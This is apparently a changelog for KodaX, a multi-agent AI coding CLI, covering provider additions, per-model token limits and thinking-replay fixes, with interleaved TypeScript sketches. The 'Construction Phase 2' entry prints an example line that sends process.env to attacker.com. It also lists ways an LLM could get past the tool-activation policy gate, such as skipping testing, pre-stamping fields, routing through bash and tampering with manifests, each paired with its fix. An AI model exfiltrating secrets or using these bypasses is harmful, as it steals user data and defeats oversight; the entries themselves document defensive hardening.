+ - **FEATURE_098 — Per-model `contextWindow` / `maxOutputTokens` lookup at the wire layer**: `KodaXModelDescriptor.contextWindow` and `maxOutputTokens` had been declared in the type since FEATURE_078 but never read at runtime; the compaction trigger and wire-level `max_tokens` always used the provider-level fallback. This release threads the **active model's** descriptor through the compaction call sites (`packages/coding`, `packages/repl`) and the wire layer (`packages/ai/src/providers/{anthropic,openai}.ts`), so each request scales correctly to that model's published limits. Custom providers' `models[]` field upgraded to accept either a literal string or a `KodaXModelDescriptor` object (back-compat preserved). Pinned correct context windows for `kimi.k2.5` (256K — earlier 128K was a misreading of the Moonshot docs, corrected in `64785de`), `zhipu.glm-5-turbo` (128K), and the five ark-coding routes (`kimi-k2.5/k2.6` 256K, `minimax-latest` 204800, `doubao-seed-2.0-{code,pro,lite}` 256K). `compaction.contextWindow` config clarified in docs as a *manual override* — the per-model descriptor is the default source.
547
+ - **Volcengine Ark Coding Plan provider (`ark-coding`)**: New AnthropicCompat-route provider for the Ark gateway. Multi-model with **server-side routing by request `model` field** (distinguishes from `kimi-for-coding`, where the server ignores the model). 9 routes regression-tested with real upstream calls: `glm-5.1` / `glm-4.7` / `kimi-k2.6` / `kimi-k2.5` / `minimax-latest` / `deepseek-v3.2` / `doubao-seed-2.0-{code,pro,lite}`. Reuses `parseToolInputWithSalvage` and the rest of the existing AnthropicCompat stack — zero new transport code.
548
+ - **Xiaomi MiMo Token Plan provider (`mimo-coding`)**: New AnthropicCompat-route provider for MiMo Token Plan gateway. Wired through the standard provider stack including cost-rates, RST-prone list (servers in this family are known to require `tool_use` input salvage on partial JSON streams), and config example. Eval matrices (`coding-plan` provider eval, `identity-roundtrip` eval) cover it alongside the other AnthropicCompat coding-plan providers.
549
+ - **Tool_use input salvage unified across Anthropic-compat + OpenAI-compat paths**: Previously `parseToolInputWithSalvage` (recovery for partial / truncated `input_json_delta` streams that some upstream servers emit) lived in the Anthropic compat path only. OpenAI-compat providers had a separate, more naive parser. Unified at the wire layer so both paths recover from the same set of edge cases — relevant especially for the new MiMo / DeepSeek-V4 / Ark routes where partial-JSON behaviour was empirically observed.
550
+ - **KodaX self-identity + runtime awareness in role prompts**: Scout / Planner / Generator / Evaluator role prompts now begin with a runtime-fact preamble identifying the agent as KodaX, naming the active provider + model, and stating which agent-mode (SA / AMA / managed) is driving the loop. Prevents identity confusion in multi-agent transcripts where the LLM occasionally hallucinates being "Claude" or "the assistant" and the user has to re-anchor.
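The argument mapping described for CLI direct dispatch in this list could work along these lines. The `InputSchemaSketch` type, the `mapArgsToInput` name, the treatment of boolean-typed keys as bare flags, and the `path` field in the usage note are all assumptions for illustration.

```typescript
interface InputSchemaSketch {
  properties: Record<string, { type: string }>;
  required?: readonly string[];
}

// Coercion driven by the declared JSON Schema type, JSON fallback for
// arrays and objects, plain string otherwise.
function coerce(raw: string, type: string | undefined): unknown {
  switch (type) {
    case "integer":
      return Number.parseInt(raw, 10);
    case "number":
      return Number(raw);
    case "boolean":
      return raw === "true" || raw === "1";
    case "array":
    case "object":
      return JSON.parse(raw);
    default:
      return raw;
  }
}

export function mapArgsToInput(
  argv: readonly string[],
  schema: InputSchemaSketch,
): Record<string, unknown> {
  const input: Record<string, unknown> = {};
  const positionals: string[] = [];

  for (let i = 0; i < argv.length; i++) {
    const arg = argv[i] as string;
    if (!arg.startsWith("--")) {
      positionals.push(arg);
      continue;
    }
    const eq = arg.indexOf("=");
    const key = eq >= 0 ? arg.slice(2, eq) : arg.slice(2);
    const type = schema.properties[key]?.type;
    if (eq >= 0) {
      input[key] = coerce(arg.slice(eq + 1), type); // --key=value
      continue;
    }
    const next = argv[i + 1];
    if (type === "boolean" || next === undefined || next.startsWith("--")) {
      input[key] = true; // --flag
      continue;
    }
    input[key] = coerce(next, type); // --key value
    i++;
  }

  // A single positional fills the first required string field not yet set.
  if (positionals.length === 1) {
    const target = (schema.required ?? []).find(
      (k) => schema.properties[k]?.type === "string" && !(k in input),
    );
    if (target !== undefined) input[target] = positionals[0];
  }
  return input;
}
```

Under these assumptions, an invocation such as `kodax count_lines sample.txt` against a schema whose only required string field is a hypothetical `path` would produce `{ path: "sample.txt" }`.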
551
+
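The FEATURE_098 lookup order in the list above (manual `compaction.contextWindow` override, then the active model's descriptor, then the provider-level fallback) can be sketched as below. The descriptor's `id` field, the `resolveModelLimits` name, and the fallback numbers in the usage note are assumptions.

```typescript
interface ModelDescriptorSketch {
  id: string; // hypothetical field name for the model label
  contextWindow?: number;
  maxOutputTokens?: number;
}

// A provider's models[] entry is either a plain label or a descriptor.
type ModelEntry = string | ModelDescriptorSketch;

interface Limits {
  contextWindow: number;
  maxOutputTokens: number;
}

export function resolveModelLimits(
  models: readonly ModelEntry[],
  activeModel: string,
  providerFallback: Limits,
  manualContextWindow?: number,
): Limits {
  const entry = models.find((m) => (typeof m === "string" ? m : m.id) === activeModel);
  // Plain string entries carry no limits of their own.
  const descriptor = typeof entry === "object" ? entry : undefined;
  return {
    contextWindow:
      manualContextWindow ?? descriptor?.contextWindow ?? providerFallback.contextWindow,
    maxOutputTokens: descriptor?.maxOutputTokens ?? providerFallback.maxOutputTokens,
  };
}
```

For example, with `models = ["glm-5.1", { id: "minimax-latest", contextWindow: 204800 }]` and an illustrative provider fallback of 128000, the active model `minimax-latest` resolves to 204800 while `glm-5.1` falls back to 128000.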
552
+ ### Fixed
553
+
554
+ - **Construction Phase 2 — policy gate ordering + lifecycle hardening**: a chain of bugs hollowed out the 4-layer defense model that v0.7.28 ships. Phase 2 review uncovered them all and this version closes them as a unit:
555
+ 1. `test()` removes its `loadHandler` call. Earlier code did `await import(file://...)` BEFORE the policy gate, so AST rules covering `eval` / `Function` did nothing against a top-level `await fetch('http://attacker.com', { body: process.env })`. Handler import is now exclusively inside `activate()` after the policy verdict is `'approve'`, making the policy gate the single chokepoint for code execution.
556
+ 2. `activate()` requires `artifact.testedAt` set. Without this an LLM could `stage_tool → activate_tool` directly, bypassing the AST / schema / LLM-review chain.
557
+ 3. `activate()` re-reads from disk by `name+version`. Filesystem is the source of truth (DD §14.1); the in-memory `handle.artifact` may be stale across the chain.
558
+ 4. `stage()` explicitly resets `testedAt` / `activatedAt` / `revokedAt` / `contentHash` on persist — defends against an LLM-supplied artifact pre-stamping `testedAt` to bypass the gate.
559
+ 5. `stage()` refuses any-status restage at the same `name@version`. Earlier code only blocked `'active'`; staged + revoked were allowed and both leak (the ESM module cache keys by file URL so re-writing `<version>.js` silently shadows previously-loaded code, and Node has no public ESM eviction API). Bumping semver is the only safe-by-construction update path.
560
+ 6. Path-traversal validation on `artifact.name` and `artifact.version` (rejects `/`, `\`, `..`, control chars, leading/trailing dots, length > 128, anything outside `[A-Za-z0-9][A-Za-z0-9._-]*`).
561
+ 7. `CtxProxy` honors `hostCtx.planModeBlockCheck` for `ctx.tools.<name>` calls. A constructed handler can no longer bypass the parent's plan-mode gate by routing builtin invocations through `ctx.tools.bash`. Predicate closes over live parent state, so toggles propagate.
562
+ 8. `CtxProxy` caps constructed→constructed call depth at `MAX_CONSTRUCTED_DEPTH=5`. Builtin callees are not counted (they don't recurse via `ctx.tools`). Catches accidental A→B→A loops.
563
+ 9. `activate()` records `contentHash = sha256(JSON.stringify(content))`; `rehydrateActiveArtifacts()` recomputes and compares. Mismatch → skip + console.warn + REPL boot banner surfaces a per-tool message ("X skipped due to manifest contentHash mismatch — re-stage and re-activate to re-approve"). Threat model: catches naive cross-session manifest tampering (LLM rewrites `.json` via the Write tool but doesn't recompute hash). Coordinated tampering (rewrite + recompute) is explicitly out of scope per single-user CLI threat model. Legacy artifacts written before `contentHash` existed rehydrate unchanged for upgrade-compat.
564
+ - **`redacted_thinking` data preservation through stream serialization**: Anthropic streams the `redacted_thinking` payload's `data` field on `content_block_start` itself (no deltas, and the stop event does not carry `content_block`). Earlier streaming code captured nothing at start and tried to read `(event as any).content_block.data` at stop — always `undefined`. The redacted reasoning was silently dropped from `thinkingBlocks`, breaking any downstream replay path. Fix: capture `block.data` into a new `currentRedactedData` state var at start; push from state at stop; reset between consecutive blocks so they don't bleed.
565
+ - **DeepSeek V4 thinking-mode multi-turn replay across providers** (issue 125): DeepSeek V4 thinking mode 400s on multi-turn requests when the assistant turn in history lacks `reasoning_content` (empirically reproduced via direct API probe). Switching from an Anthropic-compat provider to DeepSeek V4 mid-conversation also lost prior reasoning since cross-provider thinking blocks couldn't replay against Anthropic's signature verification.
566
+ - `openai.ts`: when the `replayReasoningContent` flag is set, every assistant turn carries `reasoning_content` (defaults to `''`) regardless of whether the turn produced thinking — covers cross-provider switch and thinking-only / redacted-only / no-thinking history shapes.
567
+ - `anthropic.ts`: under `strictThinkingSignature` (Anthropic official), cross-provider thinking blocks without trusted signatures convert to a `<prior_reasoning>` text block injected before tool_use to preserve reasoning intent. Kimi guard skips when strict mode is on.
568
+ - `KodaXProviderConfig`: new `replayReasoningContent` and `strictThinkingSignature` flags. `AnthropicProvider` gets `strictThinkingSignature: true`; DeepSeek V4 + Kimi/Qwen/Zhipu OpenAI-compat all opt into `replayReasoningContent` (DeepSeek verified; the other three share the identical failure-mode shape and opt in for max fault-tolerance per user direction; OpenAI proper stays explicitly off — different protocol).
569
+ - **Session history preservation on permanent thinking-mode errors** (regression): when DeepSeek thinking-mode 400 (or any permanent provider error) hit the SA / runner-driven loop, the outer wrapper used to write `messages: []` to the session snapshot, wiping the user's conversation on `/resume` — next prompt would start as a fresh session with no Scout context and progress bar at 0.
570
+ - L0 (history preservation): inner catch (`runner-driven.ts`) attaches in-flight `providerMessages` to the thrown error via a non-enumerable `__kodaxRecoveredMessages` property. Outer catch reads it back through an `Array.isArray` guard. Non-enumerable so JSON-serializing telemetry doesn't dump conversation history into logs.
571
+ - L3 (`sanitize_thinking_and_retry` recovery action): classifier identifies `reasoning_content_required` errors via three patterns; recovery coordinator gains a single-shot `thinkingSanitizationUsed` latch — drops thinking blocks once and retries once, bypassing `maxRetries`. Both runner-driven (Layer-A) and `agent.ts` (legacy SA) loops carry parallel sanitize-bypass branches; SA and AMA are first-class parallel surfaces.
572
+ - REPL UX: `retry-history` banner gets a specific message for the sanitize action so users see "dropping prior thinking · retrying" instead of the generic "Provider request timed out · retrying".
573
+ - **Issue 124 — `dispatch_child_task` fan-out gates closed**: tool was rarely triggering in real usage despite existing since v0.7.18 (FEATURE_067). Empirical eval across `zhipu-coding`, `minimax-coding`, `deepseek-v4-flash` showed the LLM dispatches correctly when given the tool — the bottleneck was layered controller gates closing the fan-out signal before downstream consumers ever saw it.
574
+ - Gate changes (`reasoning.ts`): drop `H0_DIRECT` requirement on evidence-scan + module-triage so H1 read-only investigation can fan out (the earlier H0-only gate made dispatch effectively impossible after Scout escalated); enable hypothesis-check in `H2_PLAN_EXECUTE_EVAL` (previously hardcoded `return false`); drop blanket `profile === tactical` filter for read-only fan-out classes (hypothesis-check / write class still requires tactical for safety).
575
+ - Prompt change (`role-prompt.ts`): added "When NOT to use dispatch_child_task" negative-bumper list to Scout and Generator prompts. Empirically tested on 3 providers × 3 variants × 3 tasks; ties or improves over the existing RULE A/B/C prompt.
576
+ - Telemetry (`dispatch-child-tasks.ts`): emit `[dispatch] start/end` progress markers via existing `ctx.reportToolProgress` (`KodaXEvents` channel) — zero new event types, zero new logger. `try/finally` ensures balanced start/end pairs even on executor exception.
577
+ - **`scripts/build-binary.mjs` `--define` quoting on Windows** (latent build bug): Bun's `--define key=value` substitutes the source text of `value` for every reference to `key`. The script passed `--define process.env.NODE_ENV="production"` as a Node `spawnSync` arg. On Windows the embedded `"` characters are stripped during the `spawnSync` → `CreateProcess` pipeline, so bun saw `process.env.NODE_ENV=production` and substituted bare identifier `production` — undefined at runtime, binary crashed immediately with `ReferenceError: production is not defined` at first React import. Switched to single-quoted JS string literals (`'production'`, `'true'`, `'${version}'`); single quotes survive the round-trip and bun substitutes a real string literal. Same fix applied to `KODAX_BUNDLED` and `KODAX_VERSION`. `react-devtools-core` added to `devDependencies` so `bun --compile`'s static import resolution can satisfy Ink's conditional dev-only branch (without it the bundle phase aborted with `Could not resolve: "react-devtools-core"`).
578
+ - **`kimi.k2.5` context window 128K → 256K**: earlier descriptor pin was a misreading of Moonshot's docs. Corrected in `64785de`; the subsequent FEATURE_098 plumbing now reads the correct value.
579
+ - **`max_tokens` routing — salvage + L5 normalization, L1 escalation dropped, zhipu watchdog**: cleaned up the layered `max_tokens` selection so partial-JSON salvage + L5 (final clamp to provider ceiling) is the canonical path; L1 (per-request escalation) had become redundant after FEATURE_098 plumbed per-model `maxOutputTokens` and was removed. New zhipu watchdog handles the case where the gateway responds with a token budget below the configured request — falls back to the gateway's reported limit instead of looping the request.
580
+ - **`mimo-coding` provider wiring**: cost-rates entry, RST-prone list inclusion (servers requiring `tool_use` input salvage), and config example.
581
+ - **`managed-worker` role prompt missing runtime fact**: the runtime-awareness preamble that Scout / Planner / Generator / Evaluator received was not threaded through the managed-worker path. Fixed so worker agents in the managed task graph also see the active provider / model / agent-mode.
582
+ - **`repl` package vitest config missing `@kodax/skills/shared/yaml` subpath alias**: follow-on to v0.7.27 FEATURE_086 subtask B, item 5. Test runs in the `repl` package now resolve the new subpath export.
583
+ - **Provider-policy / extension-runtime / bash test flaky timeouts**: stabilized via deterministic clock injection where the underlying logic was correct but tests were time-sensitive.
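The L0 history-preservation entry above describes attaching in-flight messages to a thrown error through a non-enumerable property and reading them back behind an `Array.isArray` guard. A minimal sketch of that pattern follows. The `Message` shape and the helper names `attachRecoveredMessages` / `readRecoveredMessages` are assumptions made for illustration; only the property name `__kodaxRecoveredMessages` comes from the changelog.

```typescript
// Hypothetical message shape, for illustration only.
type Message = { role: string; content: string };

// Property name taken from the changelog entry.
const RECOVERED_KEY = "__kodaxRecoveredMessages";

// Inner catch side: attach the in-flight messages without making them enumerable,
// so JSON.stringify and Object.keys do not pick them up.
function attachRecoveredMessages(error: Error, messages: Message[]): Error {
  Object.defineProperty(error, RECOVERED_KEY, {
    value: messages,
    enumerable: false,
    writable: false,
    configurable: true,
  });
  return error;
}

// Outer catch side: read the property back, trusting it only if it is an array.
function readRecoveredMessages(error: unknown): Message[] {
  if (typeof error !== "object" || error === null) return [];
  const candidate = (error as Record<string, unknown>)[RECOVERED_KEY];
  return Array.isArray(candidate) ? (candidate as Message[]) : [];
}

const history: Message[] = [{ role: "user", content: "hello" }];
const failure = attachRecoveredMessages(new Error("provider 400"), history);
const recovered = readRecoveredMessages(failure);

// A telemetry-style serialization that copies enumerable fields plus the message.
const serialized = JSON.stringify({ ...failure, message: failure.message });
```

Because the property is non-enumerable, `serialized` carries the error message but none of the conversation content, while `recovered` still holds the original array.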
584
+
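Item 6 of the Construction Phase 2 entry lists the rejection rules for `artifact.name` and `artifact.version`. The sketch below shows one way those rules could combine; the function name `isSafeArtifactSegment` and the constants are hypothetical, and the actual implementation may order or express the checks differently.

```typescript
// Assumed limit and pattern, copied from the rules listed in the changelog.
const MAX_SEGMENT_LENGTH = 128;
const SAFE_SEGMENT_PATTERN = /^[A-Za-z0-9][A-Za-z0-9._-]*$/;

// Returns true only when the value is safe to use as a single path segment.
function isSafeArtifactSegment(value: string): boolean {
  if (value.length === 0 || value.length > MAX_SEGMENT_LENGTH) return false;
  // The pattern alone rejects '/', '\', control characters, and a leading dot.
  if (!SAFE_SEGMENT_PATTERN.test(value)) return false;
  // The pattern still allows these two shapes, so they are checked explicitly.
  if (value.endsWith(".")) return false; // trailing dot
  if (value.includes("..")) return false; // parent-directory sequence
  return true;
}

const accepted = ["my-tool", "1.0.0", "tool_v2"].map(isSafeArtifactSegment);
const rejected = ["../etc", "a/b", "a\\b", ".hidden", "name.", "a..b", "a\u0000b"].map(
  isSafeArtifactSegment,
);
```

The explicit `..` and trailing-dot checks matter because the character class permits dots anywhere after the first character.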
585
+ ### Changed
586
+
587
+ - **Active model passed at the wire layer (anthropic / openai providers)**: prerequisite for FEATURE_098 per-model lookup. Rather than reading the provider's default model at request build time, the wire-layer methods now accept the active model identifier so the descriptor lookup hits the **actual** model, not the provider default.
588
+ - **Active model threaded through compaction call sites (coding / repl)**: same thread, downstream — compaction's `contextWindow` calculation now uses the active model's descriptor instead of the provider's default-model descriptor.
589
+ - **CLI dead-code cleanup + `constructed_cli` reserved-name tightening**: removed an unused `CliBootstrapContext` interface, an unused `listToolDefinitions` import, and clarified the reserved-subcommand list so a constructed tool literally named `skill` / `acp` / `completion` / `tools` cannot shadow the matching commander subcommand.
590
+
591
+ ### Documentation
592
+
593
+ - **FEATURE_098 / FEATURE_099 entries recorded**: provider catalog refresh + per-model context window / output limits documented as v0.7.28 features (originally planned for v0.7.29; pulled in because implementation completed early). Includes the `kimi.k2.5` 128K → 256K post-implementation correction note.
594
+ - **`kodax.config.ts` policy override design retracted**: an earlier draft proposed a user-authored `constructionPolicy` exported from `kodax.config.ts`. Review concluded this violated KodaX philosophy (`leverage LLM intelligence` + `NEVER add configuration for hypothetical needs`) — single-user CLI doesn't need a config hook the user has to think about; if a future need arises, the right shape is a `risk_mode` enum (`'strict' | 'balanced' | 'trusting'`) auto-driven by capabilities, not user-written policy functions. Deferred Design Decisions appendix in `docs/features/v0.7.28.md` records the retraction + rationale.
595
+ - **OpenAI-compat thinking replay limitation note updated**: kimi / qwen / zhipu now opt into `replayReasoningContent` (max-tolerance), tracked in KNOWN_ISSUES 125 for the "not independently verified against the API" follow-up.
596
+ - **`agent.ts` sanitize-bypass comment corrected**: the legacy SA loop and the AMA Layer-A loop are *parallel* paths, not legacy → migration. The earlier comment implied SA was being phased out; corrected to reflect that both surfaces are first-class.
597
+ - **Known issue 124 — dispatch eval baseline + provider variance probe**: documents the 4-layer compounding gate closure root-cause analysis, the implementation slice (A1 / A2 / A5b / A4 / B1) and follow-ups (A3 phantom, B2 / B3 data-driven defer, A2 pre-Scout heuristic limitation), and the cross-model variance baseline (`deepseek-v4-flash` 100% / `v4-pro` 60% / `chat` 40% direct fan-out, with v4-pro's "scope-first" pattern being delayed-but-correct multi-turn dispatch, not missed dispatch).
598
+ - **`compaction.contextWindow` clarified as manual override**: with FEATURE_098 reading per-model descriptor as the default, the user-configurable knob is now explicitly an override path. README + config docs updated accordingly.
599
+ - **FEATURE_098 follow-up planning for v0.7.29**: tracks remaining per-model gaps (e.g., `gpt-5*` family, future Anthropic models) where descriptor data is incomplete.
600
+
601
+ ---
602
+
603
+ ## [0.7.27] - 2026-04-24
604
+
605
+ ### Theme
606
+
607
+ Structural hygiene tail — legacy cleanup + repo-intelligence protocol extraction + AMA repo-intel prompt injection regression fix + Ink TUI trace surface.
608
+
609
+ ### Added
610
+
611
+ - **FEATURE_091 — `@kodax/repointel-protocol` standalone package** — extract the daemon RPC contract (`REPOINTEL_CONTRACT_VERSION`, `RepointelCommand`, `RepointelRequestPayload`/`RpcRequest`/`RpcResponse`, `RepoPreturnBundle`, host/intent enums, default endpoint) into a zero-runtime-deps npm package so external CLI clients (codex / claude / opencode) can depend on the contract without pulling the whole `@kodax/coding` runtime. Publishing path: `packages/repointel-protocol/`.
612
+ - Consumers migrated to import from `@kodax/repointel-protocol`: `packages/coding/src/index.ts` re-exports `REPOINTEL_DEFAULT_ENDPOINT` unchanged, `packages/coding/src/repo-intelligence/premium-client.ts` + `runtime.ts` switch to the new import source; the original `packages/coding/src/repo-intelligence/premium-contract.ts` is removed (git tracks the rename to `packages/repointel-protocol/src/index.ts`).
613
+ - `tsconfig.build.json` + `packages/coding/tsconfig.json` + `packages/coding/package.json` + `vitest.config.ts` all wired; `@kodax/coding` top-level consumers see no surface change.
614
+ - **Ink TUI repo-intelligence trace surface (OFF by default in REPL, tight-stacked)** — new `packages/repl/src/ui/utils/repo-intel-history.ts` renders `emitRepoIntelligenceTrace` / `emitManagedRepoIntelligenceTrace` events as single-line info items (`📡 [RepoIntel] <stage> · <details>`) with `tightSpacing: true` so consecutive trace stages stack as one compact block instead of each claiming an extra blank line. Wired in `InkREPL.tsx` via `emitInfoItemToCorrectLayer`, which now propagates `tightSpacing` through the managed-foreground ledger (previously dropped when reconstructing the ledger item, causing blank lines to return on AMA turns). `HistoryItemInfo` gained an opt-in `tightSpacing?: boolean`; `InfoItemRenderer` switches `marginBottom` between `0` and `1` based on the flag. `repoIntelligenceTrace` defaults to OFF for the Ink REPL to match v0.7.20-era transcript density (tool calls surface as usual; auto-injection stays silent unless opted in); `/repointel trace on` persists opt-in to `~/.kodax/config.json`. CLI / ACP surfaces keep the pre-existing env-only default (false) unchanged.
615
+ - **Planner / H1 Evaluator / H1 readonly Generator can now invoke repo-intel deep-capsule tools** (`module_context` / `symbol_context` / `process_context` / `impact_estimate`). Previously only Scout (unrestricted) and H2 Generator (open-scope) had access; Planner shaping a cross-module sprint contract and Evaluator precisely quantifying blast radius had to fall back to grep heuristics or wait for Scout/Generator to surface the capsule. Auto-injection (FEATURE_083) still packs only the **active** module + impact, so explicit lookups were the missing path for cross-module work. Extension lives in `tool-policy.ts` allow-lists only; tool descriptions at the registry layer already explain the contract, so no role-prompt text changes were needed. Allow-list regression tests in `tool-policy.test.ts` pin the new members.
616
+
617
+ ### Fixed
618
+
619
+ - **AMA Runner-driven path lost prompt-level repo-intelligence injection** (regression introduced in v0.7.26 FEATURE_084 Shard 6d-L). Legacy `runKodaX` injected the repo-intelligence context block (Repository Overview, Changed Scope, Active Module Intelligence, Active Impact Intelligence, Repo Intelligence Guidance) into every Scout / Planner / Generator / Evaluator role's system prompt via `buildAutoRepoIntelligenceContext` + `buildSystemPrompt`. The Runner-driven path built the role agents directly and invoked them via `Runner.run`, bypassing `runKodaX` entirely, so AMA agents ran with no prompt-level repo awareness for a full version.
620
+ - Fix: `buildAutoRepoIntelligenceContext` is now exported from `agent.ts`; `runManagedTaskViaRunner` computes the block once per entry (after `plan` resolves, before Agent chain construction) using the same `isNewSession` heuristic legacy `runKodaX` used (`messages.length === 1` → `session.initialMessages?.length === 0`). The pre-built string threads through `RunnerChainPromptContext.repoIntelligenceContext`; `resolveRoleInstructions` prepends it to every role's `createRolePrompt` output. Capture failure is swallowed (best-effort, matches legacy resilience). Tests / topology-only paths that don't set the field behave exactly as before.
621
+ - **`edit` / `multi_edit` error messages lost information in v0.7.26** — ambiguous-match + not-found error diagnostics now include line numbers, widened-anchor guidance, and the anchor-consumed-by-prior-edit case-specific diagnostic (issue #122). Restored all message detail the P2b/C4 tightening had trimmed. Symmetric across `edit` and `multi_edit`.
622
+ - **Scout/Generator PARALLEL CHILD AGENTS rule — single readOnly child dispatch re-enabled for heavy investigations**. Previously a categorical "NEVER dispatch exactly 1 child" rule blocked the case where one investigation's raw volume would crowd parent context. The rule is now a 3-branch decision tree (A — 2+ independent threads → per-thread fan-out; B — one investigation whose raw volume would crowd parent context AND only needs a summary → single readOnly child; C — small targets known + single-round → in-place parallel tool calls). `buildManagedReasoningPlan` also now builds a prompt-only heuristic fallback plan when provider resolution throws, so `chainPromptContext` stays populated and downstream role prompts keep the v0.7.22-parity context instead of falling back to minimal SCOUT_INSTRUCTIONS_FALLBACK.
623
+ - **Windows `.exe` `repointel` bin invocation failed with "not recognized as an internal or external command"** (latent since v0.7.15 per `quoteWindowsCmdArg`'s introduction; exposed now because the FEATURE_086 parity restore above reinstates the per-turn repo-intel probe on the Runner-driven path). `executePremiumBinCommand` and `warmPremiumViaBin` routed Windows bins through `cmd.exe /d /s /c "<quotedBin> <cmd> <quotedPayload>"`. Node's Windows argument escaping wraps the `/c` payload in outer quotes, which combined with `quoteWindowsCmdArg`'s inner quotes produced `\"C:\...\"` pairs that cmd's `/s` strip-rule could not undo — cmd tried to execute the literal `\"C:\Tools\...\repointel.exe\"` as a single command name and failed. Symptom: `/repointel status` reported `status=unavailable, fallback=oss` even when the daemon was already listening at the configured endpoint; `buildAutoRepoIntelligenceContext` silently fell back to the OSS baseline on every turn.
624
+ - Fix 1 — **`windowsBinNeedsShell(extension)` predicate** gates the `cmd.exe` branch. Only `.bat` / `.cmd` launchers still go through the shell; `.exe` / `.com` and bare PATH names execute directly via `execFile`, whose CreateProcess-backed quoting handles spaces and special characters natively. Applied symmetrically to `executePremiumBinCommand` and `runPremiumBinSubcommand` (renamed from `warmPremiumViaBin`, now parameterized over `'warm' | 'daemon'` so the same dispatcher can spawn SEA native daemons).
625
+ - Fix 2 — **`ensurePremiumDaemonReady(bin, endpoint)` defense-in-depth**: HTTP-probes `<endpoint>/rpc` with a `status` command before touching the bin. If the daemon is already running the bin is never invoked, which also side-steps any remaining shell-quoting quirk on unusual bin paths. Falls back to `bin warm` → `bin daemon` (for SEA native binaries whose `warm` runs in direct mode without spawning a daemon) → poll endpoint at 150ms intervals until answered or the 2s deadline elapses. `warmRepoIntelligenceRuntime` and `callPremiumDaemon` route through it; contract / build-id mismatch branches continue to use `warmPremiumViaBin` alone since `tryRecycleStaleDaemon` expects the CLI path.
626
+ - Regression test in `premium-client.test.ts` covers the "fetch failed + bin subcommands exited cleanly but daemon still unreachable" case to pin `ensurePremiumDaemonReady`'s null-return contract.
627
+ - **First-turn `refresh: true` preturn deterministically fell back to OSS** on medium repos (~800 source files). The daemon rebuilds its semantic index when `refresh: true` is set; on this author's `KodaX` repo the rebuild takes ~10.5s, but `PREMIUM_REQUEST_TIMEOUT_MS` was capped at 4s for all commands. The fetch aborted with `AbortError` → outer catch wrote `premiumFailureCache` → every subsequent call within the 2s TTL was short-circuited to `null` → the entire new session landed on OSS fallback despite a perfectly healthy daemon. `/repointel status` (which goes through `executePremiumBinCommand`, a separate path) still reported `status=ok, transport=daemon`, making the symptom hard to diagnose.
628
+ - Fix 1 — **layered fetch timeout**. New constant `PREMIUM_REFRESH_TIMEOUT_MS = 30_000`; `selectRequestTimeoutMs(request)` picks the 30s budget when `payload.refresh === true` and keeps the 4s budget for hot-path requests.
629
+ - Fix 2 — **transient-timeout cache guard**. New `isTransientTimeoutError(error)` recognises `AbortError` / `TimeoutError` / `aborted` / `timeout` messages (with recursive `cause` walk to cover undici's wrapped errors). `callPremiumDaemon`'s outer catch suppresses `rememberPremiumFailure` when the error is transient, so a single slow call cannot poison the cache for the following 2s window. Structural failures (bin missing, contract mismatch, daemon-reported `status: 'unavailable'`, build mismatch) continue to poison the cache to suppress spam.
630
+ - Regression test in `premium-client.test.ts` covers the two-phase "first call aborts, second call succeeds" scenario — under v0.7.26 the second call would have been cache-skipped and returned `null`; under the new guard it reaches fetch and succeeds.
631
+ - **Third-party Qwen-compat gateways returning `400 System message must at the begin`** after a few rounds. After compaction, lineage injects `[compaction-summary, post-compact-ledger, post-compact-file-content, ...]` as contiguous `role:'system'` entries at the start of the transcript. Under v0.7.26 the Runner-driven LLM adapter took only `messages[0]` as the system prompt (legacy assumption: exactly one leading system entry), left the rest as mid-transcript system messages, and the OpenAI-compat provider then also prepended its own `{ role: 'system' }`. Strict Qwen proxies reject any non-leading system message, and the wire ended up with 2-4 system entries interleaved.
632
+ - Fix 1 — **`buildRunnerLlmAdapter` merges every leading contiguous system entry** (not just `messages[0]`) into the adapter-level `system` parameter, so agent role instructions, compaction summary, and post-compact attachments collapse into one string; the transcript that the provider sees starts cleanly at the first user/assistant turn.
633
+ - Fix 2 — **`KodaXOpenAICompatProvider.normalizeSystemForWire` collapses every `role:'system'` on the wire** (the `system` parameter plus any system message the adapter didn't catch) into a single top-of-wire system content, defence-in-depth for any caller path that might still slip a second system through.
634
+ - Fix 3 — **v0.7.22 parity: `cleanupIncompleteToolCalls` + `validateAndFixToolHistory` re-enabled at the adapter level** (legacy `agent.ts` called these before every provider request; Runner-driven path had dropped them). Prevents orphaned `tool_use` → `tool_result` pairs that would otherwise produce the `"Cleaned incomplete tool calls"` post-trim at the same proxies.
635
+ - Regression test in `runner-driven.test.ts` covers the "3 contiguous leading system messages merge into one" case plus the tool-history sanitization path.
636
+ - `/mode` autocomplete now ranks exact command prefix above fuzzy substring.
637
+ - REPL altScreen flicker on SSH / Windows ConPTY eliminated by merging `log.clear() + log()` into a single `log.clearAndRender()` call (stop-gap while FEATURE_057 Track F / FEATURE_096 land the proper host-downgrade policy).
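The first-turn `refresh: true` entry above describes a layered fetch timeout and a transient-timeout guard. A rough sketch of both helpers follows, assuming a simplified request shape (`RequestLike`) and a recursion cap on the `cause` walk; both are illustrative assumptions, and only the constant names, function names, and timeout values come from the changelog.

```typescript
const PREMIUM_REQUEST_TIMEOUT_MS = 4_000; // hot-path budget
const PREMIUM_REFRESH_TIMEOUT_MS = 30_000; // budget when the daemon rebuilds its index

// Hypothetical, simplified request shape.
interface RequestLike {
  payload?: { refresh?: boolean };
}

function selectRequestTimeoutMs(request: RequestLike): number {
  return request.payload?.refresh === true
    ? PREMIUM_REFRESH_TIMEOUT_MS
    : PREMIUM_REQUEST_TIMEOUT_MS;
}

// Walks the `cause` chain so wrapped errors (for example "fetch failed" wrapping
// an AbortError) are still recognised. The depth cap is an assumption that
// guards against cyclic cause chains.
function isTransientTimeoutError(error: unknown, depth = 0): boolean {
  if (depth > 8 || typeof error !== "object" || error === null) return false;
  const { name, message, cause } = error as {
    name?: unknown;
    message?: unknown;
    cause?: unknown;
  };
  if (name === "AbortError" || name === "TimeoutError") return true;
  if (typeof message === "string" && /aborted|timeout/i.test(message)) return true;
  return isTransientTimeoutError(cause, depth + 1);
}

const wrappedAbort = {
  name: "TypeError",
  message: "fetch failed",
  cause: { name: "AbortError", message: "This operation was cancelled" },
};
const structuralFailure = { name: "Error", message: "contract mismatch" };
```

A caller in the spirit of the fix would skip recording the failure in its cache when `isTransientTimeoutError` returns true, and record it otherwise.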
638
+
